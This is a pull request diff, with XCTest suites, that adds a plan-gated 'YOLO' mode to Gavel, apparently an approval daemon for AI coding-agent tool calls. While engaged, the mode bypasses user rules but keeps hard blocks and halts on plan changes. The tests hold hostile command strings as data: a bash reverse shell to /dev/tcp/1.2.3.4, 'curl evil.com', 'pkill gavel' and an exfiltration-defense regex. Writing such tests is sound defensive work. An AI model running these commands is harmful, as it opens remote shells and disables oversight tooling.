### PR TITLE
feat(approval): plan-gated YOLO mode for hands-off agent work

### DIFF
--- a/Sources/Gavel/Approval/ApprovalEngine.swift
+++ b/Sources/Gavel/Approval/ApprovalEngine.swift
@@ -21,12 +21,37 @@ final class ApprovalEngine {
     let patternMatcher: PatternMatcher
     let ruleStore: RuleStore
 
+    /// Tools that schedule execution outside the live session. Even under YOLO
+    /// these still force a dialog — the agent must not silently plant a job that
+    /// fires while the user isn't watching. Other built-in PROMPT rules (e.g.
+    /// the script-eval exfil defense) ARE bypassed under YOLO; the plan + the
+    /// stage-1 hard-blocks + sensitive-path halt are the safety net.
+    private static let schedulerTools: Set<String> = ["CronCreate", "ScheduleWakeup", "CronDelete"]
+
     init(patternMatcher: PatternMatcher = PatternMatcher(), ruleStore: RuleStore = RuleStore()) {
         self.patternMatcher = patternMatcher
         self.ruleStore = ruleStore
     }
 
     func evaluate(payload: PreToolUsePayload, session: Session) -> Decision {
+        // YOLO: short-circuit the user-rule chain. Pause wins (falls through).
+        // Kept protections: hard-block (deny), sensitive-path (halt + dialog),
+        // built-in PROMPT rules (dialog, no halt — includes scheduler tools).
+        if session.isYoloActive && !session.isPaused {
+            if let reason = patternMatcher.matchDangerous(payload: payload) {
+                return Decision(verdict: .block, reason: reason)
+            }
+            if let reason = patternMatcher.matchSensitivePath(payload: payload) {
+                YoloMode.disengage(session: session, reason: "gavel-protected path: \(reason)")
+                return Decision(verdict: .block, reason: reason, askUser: true)
+            }
+            if Self.schedulerTools.contains(payload.toolName),
+               let decision = ruleStore.evaluateBuiltInPrompt(payload: payload) {
+                return decision
+            }
+            return Decision(verdict: .allow, reason: "YOLO")
+        }
+
         // 1. Hard-coded dangerous patterns (always block, no override)
         if let reason = patternMatcher.matchDangerous(payload: payload) {
             return Decision(verdict: .block, reason: reason)

--- a/Sources/Gavel/Approval/YoloMode.swift
+++ b/Sources/Gavel/Approval/YoloMode.swift
@@ -1,0 +1,99 @@
+import CryptoKit
+import Foundation
+
+/// Plan-gated YOLO mode: bypass user-authored rules between engage and halt.
+///
+/// While engaged, the approval engine takes an early branch that honors only
+/// stage-1 hard-block patterns, sensitive-path protection (which halts YOLO),
+/// and built-in scheduler prompts. User DENY / PROMPT / ALLOW / session rules
+/// are skipped. Halt triggers:
+///   1. Agent issues Write/Edit/MultiEdit on the tracked plan path.
+///   2. Plan file's sha256 differs from the hash captured at engage time.
+///   3. Plan file is deleted.
+///   4. Tool call hits matchSensitivePath (gavel-protected surface).
+///   5. Manual disengage via the UI.
+///
+/// Discovery is via `session.lastPlanPath`, stamped by HookRouter when an
+/// approved Write/Edit/MultiEdit lands on ~/.claude/plans/**/*.md. This
+/// avoids coupling to session-label/folder conventions.
+enum YoloMode {
+    private static let planPathRegex: NSRegularExpression = {
+        try! NSRegularExpression(pattern: #".*/\.claude/plans/[^/]+/[^/]+\.md$"#)
+    }()
+
+    static func canEngage(session: Session) -> (Bool, reason: String?) {
+        guard let path = session.lastPlanPath else {
+            return (false, "No plan captured yet — run /propose first")
+        }
+        guard FileManager.default.fileExists(atPath: path) else {
+            return (false, "Plan file no longer exists: \((path as NSString).lastPathComponent)")
+        }
+        return (true, nil)
+    }
+
+    @discardableResult
+    static func engage(session: Session) -> Bool {
+        let (ok, _) = canEngage(session: session)
+        guard ok, let path = session.lastPlanPath else { return false }
+        let hash = sha256(ofFileAt: path)
+        session.setYoloActive(true)
+        DispatchQueue.main.async {
+            session.yoloEngagedAt = Date()
+            session.yoloPlanPath = path
+            session.yoloPlanHash = hash
+            session.yoloDisabledReason = nil
+            session.isSubAgentInheritEnabled = true
+        }
+        return true
+    }
+
+    /// Returns disengage reason or nil. Read-only — safe from any thread.
+    static func shouldHalt(session: Session, payload: PreToolUsePayload) -> String? {
+        guard let trackedPath = session.yoloPlanPath else { return nil }
+
+        if ["Write", "Edit", "MultiEdit"].contains(payload.toolName),
+           let path = payload.filePath,
+           pathsEqual(path, trackedPath) {
+            return "plan modified by agent"
+        }
+
+        guard let currentHash = sha256(ofFileAt: trackedPath) else {
+            return "plan deleted"
+        }
+        if currentHash != session.yoloPlanHash {
+            return "plan changed on disk"
+        }
+        return nil
+    }
+
+    /// Clears YOLO state and records the reason. Posts a notification.
+    /// Caller is responsible for calling `SessionManager.saveActiveSessions()` after.
+    static func disengage(session: Session, reason: String) {
+        session.setYoloActive(false)
+        DispatchQueue.main.async {
+            session.yoloEngagedAt = nil
+            session.yoloPlanPath = nil
+            session.yoloPlanHash = nil
+            session.yoloDisabledReason = reason
+        }
+        GavelNotifications.notify(title: "Gavel — YOLO halted", body: reason)
+    }
+
+    static func isPlanPath(_ path: String) -> Bool {
+        let nsPath = path as NSString
+        let range = NSRange(location: 0, length: nsPath.length)
+        return planPathRegex.firstMatch(in: path, range: range) != nil
+    }
+
+    static func sha256(ofFileAt path: String) -> String? {
+        guard let data = try? Data(contentsOf: URL(fileURLWithPath: path)) else {
+            return nil
+        }
+        let digest = SHA256.hash(data: data)
+        return digest.map { String(format: "%02x", $0) }.joined()
+    }
+
+    private static func pathsEqual(_ a: String, _ b: String) -> Bool {
+        (a as NSString).standardizingPath == (b as NSString).standardizingPath
+    }
+}

--- a/Sources/Gavel/Daemon/HookRouter.swift
+++ b/Sources/Gavel/Daemon/HookRouter.swift
@@ -130,7 +130,7 @@ final class HookRouter {
                 let decision = Decision(verdict: .block, reason: taintReason)
                 session.stats.incrementBlock()
                 emitFeed(.decision(badge: .block, reason: taintReason, pid: session.pid, at: timestamp))
-                sendResponse(decision, respond: respond)
+                sendResponse(decision, payload: payload, session: session, respond: respond)
                 return
             }
             TaintTracker.recordTaints(command: command, into: session.taintedPaths)
@@ -145,11 +145,37 @@ final class HookRouter {
             session.stats.incrementBlock()
             let reason = "Session deny: \(rule.toolName): \(rule.pattern)"
             emitFeed(.decision(badge: .block, reason: reason, pid: session.pid, at: timestamp))
-            sendResponse(Decision(verdict: .block, reason: reason, additionalContext: rule.explanation), respond: respond)
+            sendResponse(Decision(verdict: .block, reason: reason, additionalContext: rule.explanation), payload: payload, session: session, respond: respond)
             return
         }
 
-        // Stage 1: Check engine (dangerous patterns, persistent deny/allow, pause)
+        // Stage 0.7: YOLO halt — agent touched the tracked plan or the plan changed.
+        // The disengage flips isYoloActive sync, so the engine call below sees normal chain.
+        // This call itself is routed to interactive dialog so the user sees the halt context.
+        if session.isYoloActive, let haltReason = YoloMode.shouldHalt(session: session, payload: payload) {
+            YoloMode.disengage(session: session, reason: haltReason)
+            sessionManager.saveActiveSessions()
+            emitFeed(.system("YOLO halted: \(haltReason)", pid: session.pid, at: timestamp))
+            emitFeed(.decision(badge: .block, reason: "YOLO halted: \(haltReason)", pid: session.pid, at: timestamp))
+            let decision = approvalCoordinator.requestApproval(
+                payload: payload, session: session, timestamp: timestamp,
+                forceDialog: true,
+                triggerReason: "YOLO halted: \(haltReason)",
+                triggeringRuleId: nil
+            )
+            switch decision.verdict {
+            case .allow, .prompt:
+                session.stats.incrementAllow()
+                emitFeed(.decision(badge: .allow, reason: decision.reason, pid: session.pid, at: timestamp))
+            case .block:
+                session.stats.incrementBlock()
+                emitFeed(.decision(badge: .block, reason: decision.reason, pid: session.pid, at: timestamp))
+            }
+            sendResponse(decision, payload: payload, session: session, respond: respond)
+            return
+        }
+
+        // Stage 1: Check engine (dangerous patterns, persistent deny/allow, pause, YOLO branch)
         let engineDecision = approvalEngine.evaluate(payload: payload, session: session)
         if engineDecision.verdict == .block {
             if engineDecision.askUser {
@@ -158,7 +184,7 @@ final class HookRouter {
                    session.suppressedRuleIds.contains(ruleId) {
                     session.stats.incrementAllow()
                     emitFeed(.decision(badge: .allow, reason: "Rule suppressed for session", pid: session.pid, at: timestamp))
-                    sendResponse(Decision(verdict: .allow, reason: "Rule suppressed for session"), respond: respond)
+                    sendResponse(Decision(verdict: .allow, reason: "Rule suppressed for session"), payload: payload, session: session, respond: respond)
                     return
                 }
 
@@ -171,7 +197,7 @@ final class HookRouter {
                 ) {
                     session.stats.incrementAllow()
                     emitFeed(.decision(badge: .allow, reason: "Session rule: \(rule.toolName): \(rule.pattern)", pid: session.pid, at: timestamp))
-                    sendResponse(Decision(verdict: .allow, reason: "Session rule: \(rule.pattern)"), respond: respond)
+                    sendResponse(Decision(verdict: .allow, reason: "Session rule: \(rule.pattern)"), payload: payload, session: session, respond: respond)
                     return
                 }
 
@@ -192,22 +218,24 @@ final class HookRouter {
                     session.stats.incrementBlock()
                     emitFeed(.decision(badge: .block, reason: decision.reason, pid: session.pid, at: timestamp))
                 }
-                sendResponse(decision, respond: respond)
+                sendResponse(decision, payload: payload, session: session, respond: respond)
                 return
             } else {
                 // Hard block: dangerous patterns, persistent deny, pause
                 session.stats.incrementBlock()
                 let badge: DecisionBadge = session.isPaused ? .paused : .block
                 emitFeed(.decision(badge: badge, reason: engineDecision.reason, pid: session.pid, at: timestamp))
-                sendResponse(engineDecision, respond: respond)
+                sendResponse(engineDecision, payload: payload, session: session, respond: respond)
                 return
             }
         }
-        // Persistent allow rules (have a reason) skip the dialog
+        // Persistent allow rules and the YOLO branch both return allow with a reason.
+        // Yolo gets its own badge so the feed and the UI distinguish "user rule allowed" from "yolo bypassed".
         if engineDecision.reason != nil {
             session.stats.incrementAllow()
-            emitFeed(.decision(badge: .allow, reason: engineDecision.reason, pid: session.pid, at: timestamp))
-            sendResponse(engineDecision, respond: respond)
+            let badge: DecisionBadge = session.isYoloActive ? .yolo : .allow
+            emitFeed(.decision(badge: badge, reason: engineDecision.reason, pid: session.pid, at: timestamp))
+            sendResponse(engineDecision, payload: payload, session: session, respond: respond)
             return
         }
 
@@ -215,7 +243,7 @@ final class HookRouter {
         if session.isAutoApproveActive {
             session.stats.incrementAllow()
             emitFeed(.decision(badge: .autoApprove, reason: engineDecision.reason, pid: session.pid, at: timestamp))
-            sendResponse(engineDecision, respond: respond)
+            sendResponse(engineDecision, payload: payload, session: session, respond: respond)
             return
         }
 
@@ -226,7 +254,7 @@ final class HookRouter {
         ) {
             session.stats.incrementAllow()
             emitFeed(.decision(badge: .allow, reason: "\(rule.toolName): \(rule.pattern)", pid: session.pid, at: timestamp))
-            sendResponse(engineDecision, respond: respond)
+            sendResponse(engineDecision, payload: payload, session: session, respond: respond)
             return
         }
 
@@ -235,7 +263,7 @@ final class HookRouter {
         if payload.isSubAgent && session.isSubAgentInheritEnabled {
             session.stats.incrementAllow()
             emitFeed(.decision(badge: .autoApprove, reason: "Sub-agent: \(payload.agentType ?? "unknown")", pid: session.pid, at: timestamp))
-            sendResponse(Decision(verdict: .allow, reason: "Sub-agent inherited"), respond: respond)
+            sendResponse(Decision(verdict: .allow, reason: "Sub-agent inherited"), payload: payload, session: session, respond: respond)
             return
         }
 
@@ -255,7 +283,7 @@ final class HookRouter {
             emitFeed(.decision(badge: .block, reason: decision.reason, pid: session.pid, at: timestamp))
         }
 
-        sendResponse(decision, respond: respond)
+        sendResponse(decision, payload: payload, session: session, respond: respond)
     }
 
     // MARK: - PostToolUse
@@ -283,7 +311,26 @@ final class HookRouter {
 
     // MARK: - Helpers
 
-    private func sendResponse(_ decision: Decision, respond: ((Data) -> Void)?) {
+    private func sendResponse(
+        _ decision: Decision,
+        payload: PreToolUsePayload? = nil,
+        session: Session? = nil,
+        respond: ((Data) -> Void)?
+    ) {
+        // Capture-on-write: stamp lastPlanPath whenever an approved Write/Edit/MultiEdit
+        // lands on ~/.claude/plans/**/*.md. Decouples YOLO plan discovery from session
+        // labels and folder conventions — propose can write the plan anywhere.
+        if decision.verdict == .allow,
+           let payload = payload, let session = session,
+           ["Write", "Edit", "MultiEdit"].contains(payload.toolName),
+           let path = payload.filePath,
+           YoloMode.isPlanPath(path) {
+            DispatchQueue.main.async {
+                session.lastPlanPath = path
+            }
+            sessionManager.saveActiveSessions()
+        }
+
         // Diagnostic breadcrumb: every hook response that reaches the worker
         // should produce a `[hook] respond ...` line. If a `[socket] enter`
         // ever lacks a matching `[hook] respond` and `[socket] exit wrote=N`

--- a/Sources/Gavel/Daemon/SessionManager.swift
+++ b/Sources/Gavel/Daemon/SessionManager.swift
@@ -178,6 +178,11 @@ final class SessionManager: ObservableObject {
         let label: String?
         let endedAt: Date?
         let agent: AgentKind?
+        let lastPlanPath: String?
+        let yoloEngagedAt: Date?
+        let yoloPlanPath: String?
+        let yoloPlanHash: String?
+        let yoloDisabledReason: String?
     }
 
     private struct PersistedState: Codable {
@@ -216,7 +221,12 @@ final class SessionManager: ObservableObject {
             isPaused: session.isPaused,
             label: session.label.isEmpty ? nil : session.label,
             endedAt: session.endedAt,
-            agent: session.agent
+            agent: session.agent,
+            lastPlanPath: session.lastPlanPath,
+            yoloEngagedAt: session.yoloEngagedAt,
+            yoloPlanPath: session.yoloPlanPath,
+            yoloPlanHash: session.yoloPlanHash,
+            yoloDisabledReason: session.yoloDisabledReason
         )
     }
 
@@ -258,7 +268,35 @@ final class SessionManager: ObservableObject {
         } else if let label = snap.label {
             session.label = label
         }
+        session.lastPlanPath = snap.lastPlanPath
+        rehydrateYolo(snap, into: session)
         sessions[snap.pid] = session
+    }
+
+    /// Restore YOLO state across daemon restarts. If the plan's content drifted
+    /// while we were down, disengage on load with a clear reason — preserves the
+    /// invariant that an engaged YOLO session always reflects the original plan.
+    private func rehydrateYolo(_ snap: PersistedSession, into session: Session) {
+        guard let engagedAt = snap.yoloEngagedAt,
+              let path = snap.yoloPlanPath,
+              let originalHash = snap.yoloPlanHash else {
+            session.yoloDisabledReason = snap.yoloDisabledReason
+            return
+        }
+        let currentHash = YoloMode.sha256(ofFileAt: path)
+        if currentHash == nil {
+            session.yoloDisabledReason = "plan deleted during daemon restart"
+            return
+        }
+        if currentHash != originalHash {
+            session.yoloDisabledReason = "plan changed during daemon restart"
+            return
+        }
+        session.yoloEngagedAt = engagedAt
+        session.yoloPlanPath = path
+        session.yoloPlanHash = originalHash
+        session.yoloDisabledReason = snap.yoloDisabledReason
+        session.setYoloActive(true)
     }
 
     private func rehydrateTombstone(_ snap: PersistedSession, sessionId: String) {

--- a/Sources/Gavel/Models/Decision.swift
+++ b/Sources/Gavel/Models/Decision.swift
@@ -85,6 +85,7 @@ enum DecisionBadge: String {
     case allow = "ALLOW"
     case autoApprove = "AUTO"
     case sandbox = "SANDBOX"
+    case yolo = "YOLO"
     case block = "BLOCK"
     case paused = "PAUSED"
 }

--- a/Sources/Gavel/Models/Session.swift
+++ b/Sources/Gavel/Models/Session.swift
@@ -37,6 +37,36 @@ final class Session: ObservableObject, Identifiable {
     /// Prompt-rule IDs silenced for this session. Transient; cleared on revoke.
     @Published var suppressedRuleIds: Set<UUID> = []
 
+    /// Absolute path of the most recent approved Write/Edit/MultiEdit that landed
+    /// under ~/.claude/plans/**/*.md. Captured by HookRouter post-decision so YOLO
+    /// can find the plan without depending on session-label/folder conventions.
+    @Published var lastPlanPath: String?
+
+    // YOLO mode — bypasses user rules between engage and halt. See YoloMode.swift.
+    // Worker threads gate the yolo branch on `isYoloActive`, which is backed by a
+    // lock-protected non-@Published flag for synchronous visibility. The matching
+    // @Published fields below carry UI-display state and are updated on main.
+    @Published var yoloEngagedAt: Date?
+    /// Frozen at engage time. New plan writes update lastPlanPath but NOT this.
+    @Published var yoloPlanPath: String?
+    @Published var yoloPlanHash: String?
+    @Published var yoloDisabledReason: String?
+
+    private var _yoloActive: Bool = false
+    private let yoloLock = NSLock()
+
+    var isYoloActive: Bool {
+        yoloLock.lock()
+        defer { yoloLock.unlock() }
+        return _yoloActive
+    }
+
+    func setYoloActive(_ value: Bool) {
+        yoloLock.lock()
+        _yoloActive = value
+        yoloLock.unlock()
+    }
+
     // Worker-mutable state. NOT @Published on purpose — both are touched on
     // every PreToolUse hook from background threads, and `@Published`
     // mutations from non-main contend with SwiftUI's main-thread publish
@@ -90,6 +120,11 @@ final class Session: ObservableObject, Identifiable {
         autoApproveUntil = nil
         sessionRules.removeAll()
         suppressedRuleIds.removeAll()
+        setYoloActive(false)
+        yoloEngagedAt = nil
+        yoloPlanPath = nil
+        yoloPlanHash = nil
+        yoloDisabledReason = nil
     }
 
     /// Check if a tool call matches any session allow rule.

--- a/Sources/Gavel/Monitor/FeedView.swift
+++ b/Sources/Gavel/Monitor/FeedView.swift
@@ -108,6 +108,7 @@ struct FeedRow: View {
         case .allow: return .green
         case .autoApprove: return .purple
         case .sandbox: return .orange
+        case .yolo: return .red
         case .block: return .red
         case .paused: return .yellow
         }

--- a/Sources/Gavel/Monitor/MonitorWindow.swift
+++ b/Sources/Gavel/Monitor/MonitorWindow.swift
@@ -372,6 +372,8 @@ private struct SessionRow: View {
             }
             .frame(width: 76, alignment: .leading)
 
+            yoloControl
+
             Button("Prompt") {
                 viewModel.promptSession(session)
             }
@@ -404,6 +406,62 @@ private struct SessionRow: View {
             .frame(width: 60)
             .help("SIGINT this Claude Code process so it saves to disk; resume later from the asleep row.")
         }
+    }
+
+    @ViewBuilder
+    private var yoloControl: some View {
+        if session.isYoloActive {
+            Button(action: {
+                YoloMode.disengage(session: session, reason: "manual")
+                viewModel.sessionManager.saveActiveSessions()
+                viewModel.noteInteraction()
+            }) {
+                HStack(spacing: 3) {
+                    Text("YOLO")
+                        .font(.caption.bold())
+                    Image(systemName: "xmark.circle.fill")
+                        .font(.caption2)
+                }
+            }
+            .buttonStyle(.borderedProminent)
+            .controlSize(.small)
+            .tint(.red)
+            .frame(width: 76)
+            .help(yoloActiveHelp)
+        } else {
+            Button("YOLO") {
+                if YoloMode.engage(session: session) {
+                    viewModel.sessionManager.saveActiveSessions()
+                    viewModel.noteInteraction()
+                }
+            }
+            .buttonStyle(.bordered)
+            .controlSize(.small)
+            .tint(yoloDisabledReasonTint)
+            .frame(width: 76)
+            .disabled(session.lastPlanPath == nil)
+            .help(yoloIdleHelp)
+        }
+    }
+
+    private var yoloActiveHelp: String {
+        let planName = (session.yoloPlanPath as NSString?)?.lastPathComponent ?? "unknown plan"
+        return "YOLO active — tracking \(planName). Click to disengage. User rules are bypassed; protected paths still halt."
+    }
+
+    private var yoloIdleHelp: String {
+        if let reason = session.yoloDisabledReason {
+            return "YOLO halted: \(reason). Click to re-engage with the current plan."
+        }
+        if let plan = session.lastPlanPath {
+            let name = (plan as NSString).lastPathComponent
+            return "Engage YOLO — tracking \(name). Bypasses user rules; halts on plan changes or protected-path access."
+        }
+        return "No plan captured yet — run /propose first."
+    }
+
+    private var yoloDisabledReasonTint: Color {
+        session.yoloDisabledReason != nil ? .orange : .red
     }
 
     /// Width must match actionCluster so live and dead rows align.

--- a/Tests/GavelTests/YoloApprovalEngineTests.swift
+++ b/Tests/GavelTests/YoloApprovalEngineTests.swift
@@ -1,0 +1,159 @@
+import XCTest
+@testable import Gavel
+
+/// Integration tests that exercise the YOLO branch in `ApprovalEngine.evaluate`.
+/// HookRouter-level halt routing is exercised by YoloModeTests + the integration
+/// path here — the engine's job is to honor (or skip) user rules correctly
+/// while YOLO is engaged.
+final class YoloApprovalEngineTests: XCTestCase {
+    var engine: ApprovalEngine!
+    var ruleStore: RuleStore!
+    var session: Session!
+    var ruleStorePath: String!
+    var planPath: String!
+    var tmpDir: URL!
+
+    override func setUp() {
+        ruleStorePath = NSTemporaryDirectory() + "yolo-engine-\(UUID().uuidString).json"
+        ruleStore = RuleStore(configPath: ruleStorePath)
+        engine = ApprovalEngine(patternMatcher: PatternMatcher(), ruleStore: ruleStore)
+
+        tmpDir = FileManager.default.temporaryDirectory
+            .appendingPathComponent(".claude/plans/yolo-eng-\(UUID().uuidString)", isDirectory: true)
+        try? FileManager.default.createDirectory(at: tmpDir, withIntermediateDirectories: true)
+        planPath = tmpDir.appendingPathComponent("plan.md").path
+        try? "# plan\n".write(toFile: planPath, atomically: true, encoding: .utf8)
+
+        session = Session(pid: 99999)
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        let exp = expectation(description: "main drain")
+        DispatchQueue.main.async { exp.fulfill() }
+        wait(for: [exp], timeout: 1.0)
+    }
+
+    override func tearDown() {
+        if let path = ruleStorePath {
+            try? FileManager.default.removeItem(atPath: path)
+        }
+        if let parent = tmpDir?.deletingLastPathComponent() {
+            try? FileManager.default.removeItem(at: parent)
+        }
+    }
+
+    private func payload(tool: String = "Bash", command: String? = nil, filePath: String? = nil) -> PreToolUsePayload {
+        var input: [String: AnyCodable] = [:]
+        if let c = command { input["command"] = AnyCodable(c) }
+        if let f = filePath { input["file_path"] = AnyCodable(f) }
+        return PreToolUsePayload(toolName: tool, toolInput: input)
+    }
+
+    // MARK: - S2: User rules bypassed under YOLO
+
+    func testYoloBypassesUserPromptRule() {
+        // Seed a user PROMPT rule on Bash:rm * — under YOLO, this should be skipped entirely.
+        let rule = PersistentRule(
+            toolName: "Bash",
+            pattern: "rm *",
+            verdict: .prompt,
+            explanation: "user prompt"
+        )
+        ruleStore.addRule(rule)
+
+        let decision = engine.evaluate(payload: payload(command: "rm /tmp/foo"), session: session)
+        XCTAssertEqual(decision.verdict, .allow)
+        XCTAssertEqual(decision.reason, "YOLO")
+        XCTAssertFalse(decision.askUser)
+    }
+
+    func testYoloBypassesUserDenyRule() {
+        let rule = PersistentRule(toolName: "Bash", pattern: "curl *", verdict: .block, explanation: "user deny")
+        ruleStore.addRule(rule)
+
+        let decision = engine.evaluate(payload: payload(command: "curl evil.com"), session: session)
+        XCTAssertEqual(decision.verdict, .allow, "YOLO bypasses user DENY rules — that's the whole point of YOLO")
+        XCTAssertEqual(decision.reason, "YOLO")
+    }
+
+    func testYoloBypassesBuiltInScriptEvalPromptRule() {
+        // The seeded built-in PROMPT rule "Bash: /\b(python3?|ruby|perl|node|php|lua)\b\s+(-[ce]|--eval)\b/"
+        // is exfil-defense ergonomics for normal mode. Under YOLO it MUST be bypassed —
+        // it's not a scheduler tool and doesn't plant future execution. Regression for
+        // an early-build divergence where the YOLO branch honored ALL built-in PROMPT rules.
+        let decision = engine.evaluate(
+            payload: payload(command: #"python3 -c "import sys; print(sys.version)""#),
+            session: session
+        )
+        XCTAssertEqual(decision.verdict, .allow)
+        XCTAssertEqual(decision.reason, "YOLO")
+    }
+
+    func testYoloKeepsSchedulerToolPromptRule() {
+        // CronCreate / ScheduleWakeup / CronDelete plant execution outside the live session.
+        // YOLO must NOT bypass these — they're systemic safety, not personal preference.
+        var input: [String: AnyCodable] = [:]
+        input["prompt"] = AnyCodable("do something later")
+        let payload = PreToolUsePayload(toolName: "CronCreate", toolInput: input)
+        let decision = engine.evaluate(payload: payload, session: session)
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertTrue(decision.askUser, "scheduler tools under YOLO still force dialog (no halt)")
+        XCTAssertTrue(session.isYoloActive, "scheduler prompt is a safety net, not a halt trigger")
+    }
+
+    // MARK: - S5: Sensitive path halts YOLO + forces dialog
+
+    func testSensitivePathHaltsYoloAndForcesDialog() {
+        XCTAssertTrue(session.isYoloActive)
+        let home = NSHomeDirectory()
+        let decision = engine.evaluate(
+            payload: payload(tool: "Write", filePath: "\(home)/.claude/gavel/rules.json"),
+            session: session
+        )
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertTrue(decision.askUser, "sensitive path under YOLO must still force dialog")
+        XCTAssertFalse(session.isYoloActive, "sync flag must flip immediately on halt")
+    }
+
+    // MARK: - S6: Hard-block beats YOLO without disengaging
+
+    func testHardBlockAlwaysBlocksUnderYoloAndKeepsYoloEngaged() {
+        XCTAssertTrue(session.isYoloActive)
+        let decision = engine.evaluate(
+            payload: payload(command: "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"),
+            session: session
+        )
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertFalse(decision.askUser, "hard block is a hard block — no dialog")
+        XCTAssertTrue(session.isYoloActive, "hard-block holds the safety net; no need to disengage YOLO")
+    }
+
+    func testPkillGavelBlocksUnderYolo() {
+        XCTAssertTrue(session.isYoloActive)
+        let decision = engine.evaluate(payload: payload(command: "pkill gavel"), session: session)
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertTrue(session.isYoloActive)
+    }
+
+    // MARK: - Pause wins
+
+    func testPausedSessionFallsThroughEvenWhenYoloEngaged() {
+        session.isPaused = true
+        let decision = engine.evaluate(payload: payload(command: "ls"), session: session)
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertEqual(decision.reason, "Session paused via Gavel")
+    }
+
+    // MARK: - Normal path when YOLO is off
+
+    func testNormalChainWhenYoloDisengaged() {
+        YoloMode.disengage(session: session, reason: "test")
+        let exp = expectation(description: "main drain")
+        DispatchQueue.main.async { exp.fulfill() }
+        wait(for: [exp], timeout: 1.0)
+
+        // Default allow path — no rules, no YOLO, plain "ls" passes
+        let decision = engine.evaluate(payload: payload(command: "ls"), session: session)
+        XCTAssertEqual(decision.verdict, .allow)
+        XCTAssertNil(decision.reason, "fall-through allow has no reason; HookRouter then prompts the user")
+    }
+}

--- a/Tests/GavelTests/YoloModeTests.swift
+++ b/Tests/GavelTests/YoloModeTests.swift
@@ -1,0 +1,183 @@
+import XCTest
+@testable import Gavel
+
+final class YoloModeTests: XCTestCase {
+    var session: Session!
+    var tmpDir: URL!
+    var planPath: String!
+
+    override func setUp() {
+        session = Session(pid: 12345)
+        tmpDir = FileManager.default.temporaryDirectory
+            .appendingPathComponent(".claude/plans/yolo-test-\(UUID().uuidString)", isDirectory: true)
+        try? FileManager.default.createDirectory(at: tmpDir, withIntermediateDirectories: true)
+        planPath = tmpDir.appendingPathComponent("2026-05-21_plan.md").path
+        try? "# Initial plan\n".write(toFile: planPath, atomically: true, encoding: .utf8)
+    }
+
+    override func tearDown() {
+        if let parent = tmpDir?.deletingLastPathComponent() {
+            try? FileManager.default.removeItem(at: parent)
+        }
+    }
+
+    private func payload(tool: String = "Bash", command: String? = nil, filePath: String? = nil) -> PreToolUsePayload {
+        var input: [String: AnyCodable] = [:]
+        if let c = command { input["command"] = AnyCodable(c) }
+        if let f = filePath { input["file_path"] = AnyCodable(f) }
+        return PreToolUsePayload(toolName: tool, toolInput: input)
+    }
+
+    private func waitForMain() {
+        let exp = expectation(description: "main queue drain")
+        DispatchQueue.main.async { exp.fulfill() }
+        wait(for: [exp], timeout: 1.0)
+    }
+
+    // MARK: - canEngage / engage
+
+    func testCanEngageReturnsFalseWhenNoPlan() {
+        let (ok, reason) = YoloMode.canEngage(session: session)
+        XCTAssertFalse(ok)
+        XCTAssertNotNil(reason)
+    }
+
+    func testCanEngageReturnsTrueWhenPlanExists() {
+        session.lastPlanPath = planPath
+        let (ok, reason) = YoloMode.canEngage(session: session)
+        XCTAssertTrue(ok)
+        XCTAssertNil(reason)
+    }
+
+    func testCanEngageReturnsFalseWhenPlanFileDeleted() {
+        session.lastPlanPath = planPath
+        try? FileManager.default.removeItem(atPath: planPath)
+        let (ok, reason) = YoloMode.canEngage(session: session)
+        XCTAssertFalse(ok)
+        XCTAssertNotNil(reason)
+    }
+
+    func testEngageCapturesPathAndHashAndFlipsSyncFlag() {
+        session.lastPlanPath = planPath
+        XCTAssertTrue(YoloMode.engage(session: session))
+        XCTAssertTrue(session.isYoloActive, "sync flag must flip immediately on engage")
+        waitForMain()
+        XCTAssertEqual(session.yoloPlanPath, planPath)
+        XCTAssertNotNil(session.yoloPlanHash)
+        XCTAssertNotNil(session.yoloEngagedAt)
+        XCTAssertTrue(session.isSubAgentInheritEnabled, "engage opts into sub-agent inheritance")
+    }
+
+    func testEngageFailsWithoutPlan() {
+        XCTAssertFalse(YoloMode.engage(session: session))
+        XCTAssertFalse(session.isYoloActive)
+    }
+
+    // MARK: - shouldHalt
+
+    func testShouldHaltReturnsNilWhenNotEngaged() {
+        let result = YoloMode.shouldHalt(session: session, payload: payload(tool: "Write", filePath: planPath))
+        XCTAssertNil(result)
+    }
+
+    func testShouldHaltOnWriteToTrackedPlan() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        let result = YoloMode.shouldHalt(session: session, payload: payload(tool: "Write", filePath: planPath))
+        XCTAssertEqual(result, "plan modified by agent")
+    }
+
+    func testShouldHaltOnEditToTrackedPlan() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        let result = YoloMode.shouldHalt(session: session, payload: payload(tool: "Edit", filePath: planPath))
+        XCTAssertEqual(result, "plan modified by agent")
+    }
+
+    func testShouldHaltOnMultiEditToTrackedPlan() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        let result = YoloMode.shouldHalt(session: session, payload: payload(tool: "MultiEdit", filePath: planPath))
+        XCTAssertEqual(result, "plan modified by agent")
+    }
+
+    func testReadOnTrackedPlanDoesNotHalt() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        let result = YoloMode.shouldHalt(session: session, payload: payload(tool: "Read", filePath: planPath))
+        XCTAssertNil(result)
+    }
+
+    func testUnrelatedToolCallDoesNotHalt() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        let result = YoloMode.shouldHalt(session: session, payload: payload(command: "ls"))
+        XCTAssertNil(result)
+    }
+
+    func testShouldHaltOnHashDrift() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        try? "# Mutated plan\n".write(toFile: planPath, atomically: true, encoding: .utf8)
+        let result = YoloMode.shouldHalt(session: session, payload: payload(command: "ls"))
+        XCTAssertEqual(result, "plan changed on disk")
+    }
+
+    func testShouldHaltOnPlanDeleted() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        try? FileManager.default.removeItem(atPath: planPath)
+        let result = YoloMode.shouldHalt(session: session, payload: payload(command: "ls"))
+        XCTAssertEqual(result, "plan deleted")
+    }
+
